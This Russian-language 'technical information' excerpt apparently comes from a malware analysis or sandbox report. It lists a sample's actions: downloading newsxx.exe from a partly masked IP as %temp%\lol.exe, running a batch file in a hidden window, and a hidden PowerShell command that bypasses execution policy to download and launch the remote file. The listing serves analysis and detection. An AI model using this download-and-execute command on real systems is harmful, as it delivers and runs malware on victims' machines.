Техническая информация
- http://89.##.67.200/~virtualz/newsxx.exe как %temp%\lol.exe
- %TEMP%\45c5.tmp\new 3.bat
- %TEMP%\45c5.tmp\new 3.bat
- http://89.##.67.200/~virtualz/newsxx.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\45C5.tmp\new 3.bat" "<Полный путь к файлу>""' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\45C5.tmp\new 3.bat" "<Полный путь к файлу>""
- '%WINDIR%\syswow64\cmd.exe' ,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://89.##.67.200/~virtualz/newsxx.exe','%TEMP%\lol.exe');Start-Proce...